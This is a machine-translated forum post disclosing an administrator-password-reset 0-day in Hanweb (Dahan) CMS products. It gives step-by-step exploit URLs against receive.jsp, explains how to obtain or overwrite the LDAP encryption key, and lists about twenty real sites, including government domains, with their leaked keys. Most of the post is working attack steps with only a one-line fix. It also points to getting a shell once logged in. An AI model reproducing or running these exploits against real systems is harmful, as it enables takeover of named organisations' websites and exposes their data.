Dahan network 0-day kill Administrator Password Reset Vulnerability (dual official website test)

Dahan network 0-day kill Administrator Password Reset Vulnerability (dual official website test)

Dahan network 0-day kill, reset the administrator password (test on the official website)
The full-system version of kill includes: jcms, jact, jsearch, vipchat, vc, and xxgk.

Step 1: Dahan network encryption and decryption description

LDAP key configuration file,/interface/ldap/ldapconf. xml

Get key: O3h2iB8ggnp2
 

We can use the Dahan encryption and decryption library for arbitrary encryption and decryption. As long as we know the server key, we can communicate with the server:
 

Step 2: Save the ldapconf. xml file of the key and put it in the website directory for direct access:
 

(A lot of keys are found easily) http://122.224.183.4:80/jcms/interface/ldap/ldapconf.xml [123123] http://221.231.137.195/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://202.108.199.114:80/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://202.108.199.114/jcms/interface/ldap/ldapconf.xml [OJ9Un5JmpTfN0gJx] http://6bur.cscec.com/jcms/interface/ldap/ldapconf.xml [O3h2iB8ggnp2] http://cengangpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://219.146.58.42/jcms/interface/ldap/ldapconf.xml [123123] http://cq.ea-spring.com/jcms/interface/ldap/ldapconf.xml [O3h2iB8ggnp2] http://caiyuan.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://bingmei.sdcdc.cn/jcms/interface/ldap/ldapconf.xml [UhfuXyOav5pK8hil] http://3bur.cscec.com/jcms/interface/ldap/ldapconf.xml [O3h2iB8ggnp2] http://csbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://changspcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://blbj.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://cz.anxiang.gov.cn/jcms/interface/ldap/ldapconf.xml [O3h2iB8ggnp2] http://chart.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml [T0NN3oslN3OW] http://chengdpcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://bj.clubchinachic.com/jcms/interface/ldap/ldapconf.xml [O3h2iB8ggnp2] http://dandong.xiangshan.gov.cn/jcms/interface/ldap/ldapconf.xml [123123] http://dayupcs.bf.zjsgat.gov.cn/jcms/interface/ldap/ldapconf.xml [123456] http://chdj.sinotrans-csc.com/jcms/interface/ldap/ldapconf.xml [T0NN3oslN3OW]

Take the official website for a test:
 

Access: http://app.hanweb.com.cn/jcms/interface/ldap/ldapconf.xml

Get the key: OJ9Un5JmpTfN0gJx

Step 3: Use the key OJ9Un5JmpTfN0gJx to construct the following ciphertext:
 

encrypt : e2V1Z3UdA2sNaw==decrypt : adminencrypt : DEIBRXBGcUQOM3g0decrypt : 123456

Step 4: overwrite the administrator password admin-123456

Vulnerability EXP:

Http://app.hanweb.com.cn/jcms/interface/ldap/receive.jsp? State = C & result = T & loginuser = e2v1z3uda2snw = & loginpass = deibrxbgcuqom1_0

Log on directly and automatically jump to the logon background. There are many articles about Getshell in the background:
 

Vulnerability Analysis:
 

Component functions: the/interface/ldap/receive. jsp component is a common component for synchronizing users between different Chinese systems. For example, in a jact system, you need to synchronize jcms users to your own system. This component is used to create a user. If the user to be created exists, it will be updated. Here, the Administrator's password is reset. Analyze the parameter: loginuser = e2v1z3uda2snw = loginpass = deibrxbgcuqom1_0 is the encrypted admin-123456, which overwrites the administrator password.

Source code analysis:
 

# \ Interface \ ldap \ receive. jsp // obtain the String loginuser = Convert. getParameter (request, "loginuser", "", true, true); // username String loginpass = Convert. getParameter (request, "loginpass", "", true, true); // password // create the user object Merp_Pub_UserEntity entity = new Merp_Pub_UserEntity (); entity. setVc_loginid (loginuser); entity. setVc_password (loginpass); // verify whether the user is valid ldapBlf. checkValidate (entity); # decompile jcms. blf. user. ldapBLF. java // For the passed parameters, the decryption vc_loginid = decrypt (vc_loginid, this. encrypttype); vc_pwd = decrypt (vc_pwd, this. encrypttype); // insert or update the database information insertOrUpdateUser (ldapEn, groupid, 0) on the decrypted user information );

New posture:

The previously submitted reset Administrator Password vulnerability is caused by ldap key leakage.

/Interface/ldap/ldapconf. xml, which is directly stored in the website directory for direct access.


In my test of the latest official demo version,/interface/ldap/ldapconf. xml is inaccessible.

In this way, the plaintext key is invisible, so the administrator password cannot be reset.

Demo: http://demo.hanweb.com/jcms/
 

As a result, I further analyzed the component/interface/ldap/receive. jsp and found a pleasant surprise.
 

If (state. equals ("S") {// register the application boolean B = ldapBlf. writeXML (appname, enckey, ldapurl, webtype, ssourl, encrypttype );}

The original xml configuration file can be overwritten, so the construction of EXP:

Http://demo.hanweb.com/jcms/interface/ldap/receive.jsp? State = S & enckey = key888
 

Construct the encryption and decryption string: enckey: key888encrypt: BWcCb3FrBBh8bQ = decrypt: admin overwrite the administrator password: admin-admin

Vulnerability EXP:

Http://demo.hanweb.com/jcms/interface/ldap/receive.jsp? State = C & result = T & loginuser = BWcCb3FrBBh8bQ ==& loginpass = BWcCb3FrBBh8bQ =

Once again, log on successfully:
 

Impact scope:

Through the above two positions, the new and old versions of the entire system ensure that the entire version of the kill, including: jcms, jact, jsearch, vipchat, vc, xxgk and so on.

It's easy to add thousands of sites that have been listed above.


! Apply for refinement!

Key, LDAP, encryption and decryption, programming, Case, kill, two poses, two official website verification, source code analysis, vulnerability analysis!

! Apply for refinement!

Solution:

Fix design logic vulnerabilities.